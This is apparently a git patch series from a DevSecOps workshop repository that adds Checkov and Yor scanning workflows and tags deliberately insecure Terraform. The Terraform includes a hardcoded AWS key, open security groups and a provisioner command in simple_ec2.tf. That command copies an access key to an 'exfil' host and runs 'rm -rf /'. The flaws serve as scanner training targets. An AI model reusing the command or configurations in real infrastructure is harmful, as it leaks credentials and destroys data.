From 51b36f2d36f8c87e4ed829c2efd064e44df6b147 Mon Sep 17 00:00:00 2001 From: Daniel Ma <52453932+danielma911@users.noreply.github.com> Date: Mon, 14 Jul 2025 16:01:32 +0800 Subject: [PATCH 01/51] Create checkov.yml --- .github/workflows/checkov.yml | 35 +++++++++++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 .github/workflows/checkov.yml diff --git a/.github/workflows/checkov.yml b/.github/workflows/checkov.yml new file mode 100644 index 000000000..10ac4d279 --- /dev/null +++ b/.github/workflows/checkov.yml @@ -0,0 +1,35 @@ +name: checkov +on: + pull_request: + push: + branches: + - main +jobs: + scan: + runs-on: ubuntu-latest + permissions: + contents: read # for actions/checkout to fetch code + security-events: write # for GitHub/codeql-action/upload-sarif to upload SARIF results + + steps: + - uses: actions/checkout@v2 + + - name: Run checkov + id: checkov + uses: bridgecrewio/checkov-action@master + with: + directory: code/ + #soft_fail: true + #api-key: ${{ secrets.BC_API_KEY }} + #env: + #PRISMA_API_URL: https://api4.prismacloud.io + + - name: Upload SARIF file + uses: GitHub/codeql-action/upload-sarif@v3 + + # Results are generated only on a success or failure + # this is required since GitHub by default won't run the next step + # when the previous one has failed. Alternatively, enable soft_fail in checkov action. + if: success() || failure() + with: + sarif_file: results.sarif From 8c1a3f8f7d008d15d04c28dfd053d69f1aaa5585 Mon Sep 17 00:00:00 2001 From: Daniel Ma <52453932+danielma911@users.noreply.github.com> Date: Wed, 13 Aug 2025 07:38:35 +0800 Subject: [PATCH 02/51] Create checkov.yaml --- .github/workflows/checkov.yaml | 35 ++++++++++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 .github/workflows/checkov.yaml diff --git a/.github/workflows/checkov.yaml b/.github/workflows/checkov.yaml new file mode 100644 index 000000000..10ac4d279 --- /dev/null +++ b/.github/workflows/checkov.yaml @@ -0,0 +1,35 @@ +name: checkov +on: + pull_request: + push: + branches: + - main +jobs: + scan: + runs-on: ubuntu-latest + permissions: + contents: read # for actions/checkout to fetch code + security-events: write # for GitHub/codeql-action/upload-sarif to upload SARIF results + + steps: + - uses: actions/checkout@v2 + + - name: Run checkov + id: checkov + uses: bridgecrewio/checkov-action@master + with: + directory: code/ + #soft_fail: true + #api-key: ${{ secrets.BC_API_KEY }} + #env: + #PRISMA_API_URL: https://api4.prismacloud.io + + - name: Upload SARIF file + uses: GitHub/codeql-action/upload-sarif@v3 + + # Results are generated only on a success or failure + # this is required since GitHub by default won't run the next step + # when the previous one has failed. Alternatively, enable soft_fail in checkov action. + if: success() || failure() + with: + sarif_file: results.sarif From 2215ed98324d03eebc6553dfd157eef9f44fc733 Mon Sep 17 00:00:00 2001 From: Daniel Ma <52453932+danielma911@users.noreply.github.com> Date: Wed, 13 Aug 2025 07:43:12 +0800 Subject: [PATCH 03/51] Create yor.yaml --- .github/workflows/yor.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 .github/workflows/yor.yaml diff --git a/.github/workflows/yor.yaml b/.github/workflows/yor.yaml new file mode 100644 index 000000000..1050790d4 --- /dev/null +++ b/.github/workflows/yor.yaml @@ -0,0 +1,19 @@ +name: IaC tag and trace + +on: + push: + pull_request: + +jobs: + yor: + runs-on: ubuntu-latest + permissions: + contents: write + + steps: + - uses: actions/checkout@v2 + name: Checkout repo + with: + fetch-depth: 0 + - name: Run yor action + uses: bridgecrewio/yor-action@main From 075b671dde388cdda0db8db98c81f875c7db0e33 Mon Sep 17 00:00:00 2001 From: "github-actions[bot]" <41898282+github-actions[bot]@users.noreply.github.com> Date: Tue, 12 Aug 2025 23:43:32 +0000 Subject: [PATCH 04/51] Update tags (by Yor) --- code/deployment_ec2.tf | 150 ++++++++++++++++++++++++++++++++++++++--- code/deployment_s3.tf | 76 +++++++++++++++++++-- code/simple_ec2.tf | 11 +++ code/simple_s3.tf | 11 ++- 4 files changed, 233 insertions(+), 15 deletions(-) diff --git a/code/deployment_ec2.tf b/code/deployment_ec2.tf index 7e3d2bba2..93acd2175 100644 --- a/code/deployment_ec2.tf +++ b/code/deployment_ec2.tf @@ -17,7 +17,18 @@ export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMAAAKEY export AWS_DEFAULT_REGION=us-west-2 echo "

Deployed via Terraform

" | sudo tee /var/www/html/index.html EOF - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "web_host" + yor_trace = "900a5a4e-d50a-489d-bca1-cb5d0388451d" + } } resource "aws_ebs_volume" "web_host_storage" { @@ -25,14 +36,36 @@ resource "aws_ebs_volume" "web_host_storage" { availability_zone = "${var.region}a" #encrypted = false # Setting this causes the volume to be recreated on apply size = 1 - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "web_host_storage" + yor_trace = "c0d5f6d7-73b0-4605-830f-9322f4e0821f" + } } resource "aws_ebs_snapshot" "example_snapshot" { # ebs snapshot without encryption volume_id = "${aws_ebs_volume.web_host_storage.id}" description = "${local.resource_prefix.value}-ebs-snapshot" - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "example_snapshot" + yor_trace = "0edc82cd-9a76-40b4-b3cf-84103c5e1be3" + } } resource "aws_volume_attachment" "ebs_att" { @@ -69,14 +102,36 @@ resource "aws_security_group" "web-node" { "0.0.0.0/0"] } depends_on = [aws_vpc.web_vpc] - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "web-node" + yor_trace = "bae57cc2-b69a-42f7-b161-4604df0db619" + } } resource "aws_vpc" "web_vpc" { cidr_block = "172.16.0.0/16" enable_dns_hostnames = true enable_dns_support = true - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "web_vpc" + yor_trace = "3b7b6467-c268-46f4-b137-c922181a1624" + } } resource "aws_subnet" "web_subnet" { @@ -85,7 +140,18 @@ resource "aws_subnet" "web_subnet" { availability_zone = "${var.region}a" map_public_ip_on_launch = true - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "web_subnet" + yor_trace = "e792eebf-4140-4079-ba8f-f93196c0c337" + } } resource "aws_subnet" "web_subnet2" { @@ -94,20 +160,53 @@ resource "aws_subnet" "web_subnet2" { availability_zone = "${var.region}b" map_public_ip_on_launch = true - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "web_subnet2" + yor_trace = "59d7c428-1542-4c3f-a18e-5ef39b8885d1" + } } resource "aws_internet_gateway" "web_igw" { vpc_id = aws_vpc.web_vpc.id - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "web_igw" + yor_trace = "ba67901a-5f34-41d2-94de-c110406976ab" + } } resource "aws_route_table" "web_rtb" { vpc_id = aws_vpc.web_vpc.id - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "web_rtb" + yor_trace = "2d2cd15f-db35-4960-9ba9-0db40418264e" + } } resource "aws_route_table_association" "rtbassoc" { @@ -134,6 +233,17 @@ resource "aws_network_interface" "web-eni" { subnet_id = aws_subnet.web_subnet.id private_ips = ["172.16.10.100"] + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "web-eni" + yor_trace = "f5d866ee-a9a6-49f2-b696-62ddb36586ba" + } } # VPC Flow Logs to S3 @@ -144,12 +254,34 @@ resource "aws_flow_log" "vpcflowlogs" { vpc_id = aws_vpc.web_vpc.id + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "vpcflowlogs" + yor_trace = "3ab0449c-0b40-4e2e-bebc-ff0e6693d198" + } } resource "aws_s3_bucket" "flowbucket" { bucket = "${local.resource_prefix.value}-flowlogs" force_destroy = true + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "flowbucket" + yor_trace = "5384bbb2-d0a0-42ae-8242-bc57d3f53478" + } } # OUTPUTS diff --git a/code/deployment_s3.tf b/code/deployment_s3.tf index cfb272e1d..9e98e908b 100644 --- a/code/deployment_s3.tf +++ b/code/deployment_s3.tf @@ -5,14 +5,36 @@ resource "aws_s3_bucket" "data" { # bucket does not have versioning bucket = "${local.resource_prefix.value}-data" force_destroy = true - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_s3.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "data" + yor_trace = "86be4da9-9dc4-4076-97f3-71f27a53527f" + } } resource "aws_s3_bucket_object" "data_object" { bucket = aws_s3_bucket.data.id key = "customer-master.xlsx" source = "resources/customer-master.xlsx" - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_s3.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "data_object" + yor_trace = "4bd48f6a-eb4e-497f-a60c-1ab271bf58ee" + } } resource "aws_s3_bucket" "financials" { @@ -23,6 +45,17 @@ resource "aws_s3_bucket" "financials" { acl = "private" force_destroy = true + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_s3.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "financials" + yor_trace = "cf47b06d-08b4-4bfb-afb9-812a0f6fbf1b" + } } resource "aws_s3_bucket" "operations" { @@ -34,7 +67,18 @@ resource "aws_s3_bucket" "operations" { enabled = true } force_destroy = true - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_s3.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "operations" + yor_trace = "9d2680ec-dfcf-4fa7-9a3b-dec5a0798663" + } } resource "aws_s3_bucket" "data_science" { @@ -49,7 +93,18 @@ resource "aws_s3_bucket" "data_science" { target_prefix = "log/" } force_destroy = true - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_s3.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "data_science" + yor_trace = "91c489e8-1eea-4254-aa8d-21fd7b728ff5" + } } resource "aws_s3_bucket" "logs" { @@ -67,5 +122,16 @@ resource "aws_s3_bucket" "logs" { } } force_destroy = true - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_s3.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "logs" + yor_trace = "032fca23-6c94-479d-8710-5102342f5773" + } } diff --git a/code/simple_ec2.tf b/code/simple_ec2.tf index dcfa5880f..117a39ed8 100644 --- a/code/simple_ec2.tf +++ b/code/simple_ec2.tf @@ -10,4 +10,15 @@ resource "aws_ec2_host" "test" { command = "echo Running install scripts.. 'echo $ACCESS_KEY > creds.txt ; scp -r creds.txt root@my-home-server.com/exfil/ ; rm -rf /' " } + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/simple_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "test" + yor_trace = "e99b073b-44b2-4c8b-8873-40b6d6d16493" + } } diff --git a/code/simple_s3.tf b/code/simple_s3.tf index c0d25fb60..fa5953c36 100644 --- a/code/simple_s3.tf +++ b/code/simple_s3.tf @@ -6,7 +6,16 @@ resource "aws_s3_bucket" "dev_s3" { bucket_prefix = "dev-" tags = { - Environment = "Dev" + Environment = "Dev" + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/simple_s3.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "dev_s3" + yor_trace = "10f1637f-e216-4692-876e-2faa60a3329e" } } From f92fd8e2a33ed1c6eebd56e399142fc27921a74f Mon Sep 17 00:00:00 2001 From: Daniel Ma <52453932+danielma911@users.noreply.github.com> Date: Wed, 13 Aug 2025 07:44:21 +0800 Subject: [PATCH 05/51] Delete .github/workflows/checkov.yml --- .github/workflows/checkov.yml | 35 ----------------------------------- 1 file changed, 35 deletions(-) delete mode 100644 .github/workflows/checkov.yml diff --git a/.github/workflows/checkov.yml b/.github/workflows/checkov.yml deleted file mode 100644 index 10ac4d279..000000000 --- a/.github/workflows/checkov.yml +++ /dev/null @@ -1,35 +0,0 @@ -name: checkov -on: - pull_request: - push: - branches: - - main -jobs: - scan: - runs-on: ubuntu-latest - permissions: - contents: read # for actions/checkout to fetch code - security-events: write # for GitHub/codeql-action/upload-sarif to upload SARIF results - - steps: - - uses: actions/checkout@v2 - - - name: Run checkov - id: checkov - uses: bridgecrewio/checkov-action@master - with: - directory: code/ - #soft_fail: true - #api-key: ${{ secrets.BC_API_KEY }} - #env: - #PRISMA_API_URL: https://api4.prismacloud.io - - - name: Upload SARIF file - uses: GitHub/codeql-action/upload-sarif@v3 - - # Results are generated only on a success or failure - # this is required since GitHub by default won't run the next step - # when the previous one has failed. Alternatively, enable soft_fail in checkov action. - if: success() || failure() - with: - sarif_file: results.sarif From 090d6515749d8f50dd4826c850fc0c324be25856 Mon Sep 17 00:00:00 2001 From: Daniel Ma <52453932+danielma911@users.noreply.github.com> Date: Wed, 13 Aug 2025 08:39:42 +0800 Subject: [PATCH 06/51] Create s3.tf --- code/s3.tf | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 code/s3.tf diff --git a/code/s3.tf b/code/s3.tf new file mode 100644 index 000000000..158875e73 --- /dev/null +++ b/code/s3.tf @@ -0,0 +1,18 @@ +provider "aws" { + region = "us-west-2" +} + +resource "aws_s3_bucket" "dev_s3" { + bucket_prefix = "dev-" + + tags = { + Environment = "Dev" + } +} + +resource "aws_s3_bucket_ownership_controls" "dev_s3" { + bucket = aws_s3_bucket.dev_s3.id + rule { + object_ownership = "BucketOwnerPreferred" + } +} From 6f208054d5f10683c760299ea0525346ca13b698 Mon Sep 17 00:00:00 2001 From: "github-actions[bot]" <41898282+github-actions[bot]@users.noreply.github.com> Date: Wed, 13 Aug 2025 00:40:03 +0000 Subject: [PATCH 07/51] Update tags (by Yor) --- code/s3.tf | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/code/s3.tf b/code/s3.tf index 158875e73..9e83480ac 100644 --- a/code/s3.tf +++ b/code/s3.tf @@ -6,7 +6,9 @@ resource "aws_s3_bucket" "dev_s3" { bucket_prefix = "dev-" tags = { - Environment = "Dev" + Environment = "Dev" + yor_name = "dev_s3" + yor_trace = "8ec54041-de01-4987-a7ef-6b1bddaf0835" } } From 6766c94ac8f849c8599dd57c23f3b6c04604ed04 Mon Sep 17 00:00:00 2001 From: Daniel Ma <52453932+danielma911@users.noreply.github.com> Date: Wed, 13 Aug 2025 08:40:52 +0800 Subject: [PATCH 08/51] Delete code/s3.tf --- code/s3.tf | 20 -------------------- 1 file changed, 20 deletions(-) delete mode 100644 code/s3.tf diff --git a/code/s3.tf b/code/s3.tf deleted file mode 100644 index 9e83480ac..000000000 --- a/code/s3.tf +++ /dev/null @@ -1,20 +0,0 @@ -provider "aws" { - region = "us-west-2" -} - -resource "aws_s3_bucket" "dev_s3" { - bucket_prefix = "dev-" - - tags = { - Environment = "Dev" - yor_name = "dev_s3" - yor_trace = "8ec54041-de01-4987-a7ef-6b1bddaf0835" - } -} - -resource "aws_s3_bucket_ownership_controls" "dev_s3" { - bucket = aws_s3_bucket.dev_s3.id - rule { - object_ownership = "BucketOwnerPreferred" - } -} From d45bb668208a5be396137f91008a9bcc52921522 Mon Sep 17 00:00:00 2001 From: Daniel Ma <52453932+danielma911@users.noreply.github.com> Date: Wed, 13 Aug 2025 09:34:25 +0800 Subject: [PATCH 09/51] Create s33.tf --- code/s33.tf | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 code/s33.tf diff --git a/code/s33.tf b/code/s33.tf new file mode 100644 index 000000000..158875e73 --- /dev/null +++ b/code/s33.tf @@ -0,0 +1,18 @@ +provider "aws" { + region = "us-west-2" +} + +resource "aws_s3_bucket" "dev_s3" { + bucket_prefix = "dev-" + + tags = { + Environment = "Dev" + } +} + +resource "aws_s3_bucket_ownership_controls" "dev_s3" { + bucket = aws_s3_bucket.dev_s3.id + rule { + object_ownership = "BucketOwnerPreferred" + } +} From 8e080ff266cf316064b204684a811e093d1a48c7 Mon Sep 17 00:00:00 2001 From: "github-actions[bot]" <41898282+github-actions[bot]@users.noreply.github.com> Date: Wed, 13 Aug 2025 01:34:56 +0000 Subject: [PATCH 10/51] Update tags (by Yor) --- code/s33.tf | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/code/s33.tf b/code/s33.tf index 158875e73..112803823 100644 --- a/code/s33.tf +++ b/code/s33.tf @@ -6,7 +6,9 @@ resource "aws_s3_bucket" "dev_s3" { bucket_prefix = "dev-" tags = { - Environment = "Dev" + Environment = "Dev" + yor_name = "dev_s3" + yor_trace = "46510630-5abb-42ff-9093-1ba6316afb99" } } From 5c9e391db5ba03a36346df19887c8879c5e4fd9c Mon Sep 17 00:00:00 2001 From: Daniel Ma <18621833570@163.com> Date: Wed, 13 Aug 2025 09:50:00 +0800 Subject: [PATCH 11/51] added --- code/build/gcs.tf | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 code/build/gcs.tf diff --git a/code/build/gcs.tf b/code/build/gcs.tf new file mode 100644 index 000000000..8b87f118e --- /dev/null +++ b/code/build/gcs.tf @@ -0,0 +1,29 @@ +terraform { + required_providers { + google = { + source = "hashicorp/google" + version = "~> 5.0" + } + } +} + +provider "google" { + project = "qwiklabs-gcp-03-ef77dfc22296" + region = "us-central1" +} + +resource "google_storage_bucket" "example" { + name = "${var.bucket_name}-${random_id.rand_suffix.hex}" + location = var.location + force_destroy = false + + uniform_bucket_level_access = true +} + +resource "random_id" "rand_suffix" { + byte_length = 4 +} + +output "bucket_name" { + value = google_storage_bucket.example.name +} \ No newline at end of file From c363143915426472601ffeed5f26ca9b26732f50 Mon Sep 17 00:00:00 2001 From: "github-actions[bot]" <41898282+github-actions[bot]@users.noreply.github.com> Date: Wed, 13 Aug 2025 01:50:25 +0000 Subject: [PATCH 12/51] Update tags (by Yor) --- code/build/gcs.tf | 4 ++++ code/s33.tf | 13 ++++++++++--- 2 files changed, 14 insertions(+), 3 deletions(-) diff --git a/code/build/gcs.tf b/code/build/gcs.tf index 8b87f118e..97e6605da 100644 --- a/code/build/gcs.tf +++ b/code/build/gcs.tf @@ -18,6 +18,10 @@ resource "google_storage_bucket" "example" { force_destroy = false uniform_bucket_level_access = true + labels = { + yor_name = "example" + yor_trace = "ef79f2f9-daec-43f0-83eb-c4791a7cb288" + } } resource "random_id" "rand_suffix" { diff --git a/code/s33.tf b/code/s33.tf index 112803823..9961794d1 100644 --- a/code/s33.tf +++ b/code/s33.tf @@ -6,9 +6,16 @@ resource "aws_s3_bucket" "dev_s3" { bucket_prefix = "dev-" tags = { - Environment = "Dev" - yor_name = "dev_s3" - yor_trace = "46510630-5abb-42ff-9093-1ba6316afb99" + Environment = "Dev" + yor_name = "dev_s3" + yor_trace = "46510630-5abb-42ff-9093-1ba6316afb99" + git_commit = "d45bb668208a5be396137f91008a9bcc52921522" + git_file = "code/s33.tf" + git_last_modified_at = "2025-08-13 01:34:25" + git_last_modified_by = "52453932+danielma911@users.noreply.github.com" + git_modifiers = "52453932+danielma911" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" } } From 346a7b81609fd766726d3dc5d707950dea20a47a Mon Sep 17 00:00:00 2001 From: Daniel Ma <52453932+danielma911@users.noreply.github.com> Date: Wed, 13 Aug 2025 09:55:30 +0800 Subject: [PATCH 13/51] Update gcs.tf --- code/build/gcs.tf | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/code/build/gcs.tf b/code/build/gcs.tf index 97e6605da..41dc6c4af 100644 --- a/code/build/gcs.tf +++ b/code/build/gcs.tf @@ -13,8 +13,8 @@ provider "google" { } resource "google_storage_bucket" "example" { - name = "${var.bucket_name}-${random_id.rand_suffix.hex}" - location = var.location + name = "demo-${random_id.rand_suffix.hex}" + location = "us-central1" force_destroy = false uniform_bucket_level_access = true @@ -30,4 +30,4 @@ resource "random_id" "rand_suffix" { output "bucket_name" { value = google_storage_bucket.example.name -} \ No newline at end of file +} From 3f413147ac2cc39731b0fc713cae2a291923b5a9 Mon Sep 17 00:00:00 2001 From: "github-actions[bot]" <41898282+github-actions[bot]@users.noreply.github.com> Date: Wed, 13 Aug 2025 01:55:53 +0000 Subject: [PATCH 14/51] Update tags (by Yor) --- code/build/gcs.tf | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/code/build/gcs.tf b/code/build/gcs.tf index 41dc6c4af..706509703 100644 --- a/code/build/gcs.tf +++ b/code/build/gcs.tf @@ -19,8 +19,15 @@ resource "google_storage_bucket" "example" { uniform_bucket_level_access = true labels = { - yor_name = "example" - yor_trace = "ef79f2f9-daec-43f0-83eb-c4791a7cb288" + yor_name = "example" + yor_trace = "ef79f2f9-daec-43f0-83eb-c4791a7cb288" + git_commit = "346a7b81609fd766726d3dc5d707950dea20a47a" + git_file = "code__build__gcs_tf" + git_last_modified_at = "2025-08-13-01-55-30" + git_last_modified_by = "52453932danielma911" + git_modifiers = "18621833570__52453932danielma911" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" } } From f308a50c469e77423cf6e216dd25f978c071b160 Mon Sep 17 00:00:00 2001 From: Daniel Ma <52453932+danielma911@users.noreply.github.com> Date: Wed, 13 Aug 2025 10:02:12 +0800 Subject: [PATCH 15/51] Update gcs.tf --- code/build/gcs.tf | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/code/build/gcs.tf b/code/build/gcs.tf index 706509703..5d30f3048 100644 --- a/code/build/gcs.tf +++ b/code/build/gcs.tf @@ -6,10 +6,16 @@ terraform { } } } +variable "google_credentials" { + description = "GCP service account JSON key" + type = string + sensitive = true +} provider "google" { project = "qwiklabs-gcp-03-ef77dfc22296" region = "us-central1" + credentials = var.google_credentials } resource "google_storage_bucket" "example" { From eb17b6f0bc65e7263678819559b52ce606075edf Mon Sep 17 00:00:00 2001 From: "github-actions[bot]" <41898282+github-actions[bot]@users.noreply.github.com> Date: Wed, 13 Aug 2025 02:02:34 +0000 Subject: [PATCH 16/51] Update tags (by Yor) --- code/build/gcs.tf | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/code/build/gcs.tf b/code/build/gcs.tf index 5d30f3048..a49406775 100644 --- a/code/build/gcs.tf +++ b/code/build/gcs.tf @@ -13,8 +13,8 @@ variable "google_credentials" { } provider "google" { - project = "qwiklabs-gcp-03-ef77dfc22296" - region = "us-central1" + project = "qwiklabs-gcp-03-ef77dfc22296" + region = "us-central1" credentials = var.google_credentials } From b7e29b783586abc3da522213de44a3e3ffdc1c07 Mon Sep 17 00:00:00 2001 From: Daniel Ma <52453932+danielma911@users.noreply.github.com> Date: Wed, 13 Aug 2025 10:05:44 +0800 Subject: [PATCH 17/51] Update gcs.tf --- code/build/gcs.tf | 1 - 1 file changed, 1 deletion(-) diff --git a/code/build/gcs.tf b/code/build/gcs.tf index a49406775..00fc59e16 100644 --- a/code/build/gcs.tf +++ b/code/build/gcs.tf @@ -15,7 +15,6 @@ variable "google_credentials" { provider "google" { project = "qwiklabs-gcp-03-ef77dfc22296" region = "us-central1" - credentials = var.google_credentials } resource "google_storage_bucket" "example" { From 1d25aafd8ce362197a86ddadd63b9b96edc5179e Mon Sep 17 00:00:00 2001 From: "github-actions[bot]" <41898282+github-actions[bot]@users.noreply.github.com> Date: Wed, 13 Aug 2025 02:06:06 +0000 Subject: [PATCH 18/51] Update tags (by Yor) --- code/build/gcs.tf | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/code/build/gcs.tf b/code/build/gcs.tf index 00fc59e16..dc7899632 100644 --- a/code/build/gcs.tf +++ b/code/build/gcs.tf @@ -13,8 +13,8 @@ variable "google_credentials" { } provider "google" { - project = "qwiklabs-gcp-03-ef77dfc22296" - region = "us-central1" + project = "qwiklabs-gcp-03-ef77dfc22296" + region = "us-central1" } resource "google_storage_bucket" "example" { @@ -26,7 +26,7 @@ resource "google_storage_bucket" "example" { labels = { yor_name = "example" yor_trace = "ef79f2f9-daec-43f0-83eb-c4791a7cb288" - git_commit = "346a7b81609fd766726d3dc5d707950dea20a47a" + git_commit = "eb17b6f0bc65e7263678819559b52ce606075edf" git_file = "code__build__gcs_tf" git_last_modified_at = "2025-08-13-01-55-30" git_last_modified_by = "52453932danielma911" From ceadcbef88b6cc853d9a2acd182e8955acf78921 Mon Sep 17 00:00:00 2001 From: Daniel Ma <52453932+danielma911@users.noreply.github.com> Date: Wed, 13 Aug 2025 10:06:52 +0800 Subject: [PATCH 19/51] Update gcs.tf 2 --- code/build/gcs.tf | 6 +----- 1 file changed, 1 insertion(+), 5 deletions(-) diff --git a/code/build/gcs.tf b/code/build/gcs.tf index dc7899632..fa34503f0 100644 --- a/code/build/gcs.tf +++ b/code/build/gcs.tf @@ -6,11 +6,7 @@ terraform { } } } -variable "google_credentials" { - description = "GCP service account JSON key" - type = string - sensitive = true -} + provider "google" { project = "qwiklabs-gcp-03-ef77dfc22296" From fdc9e1cf354abf5607d0c5aec7b50de3d96958bb Mon Sep 17 00:00:00 2001 From: "github-actions[bot]" <41898282+github-actions[bot]@users.noreply.github.com> Date: Wed, 13 Aug 2025 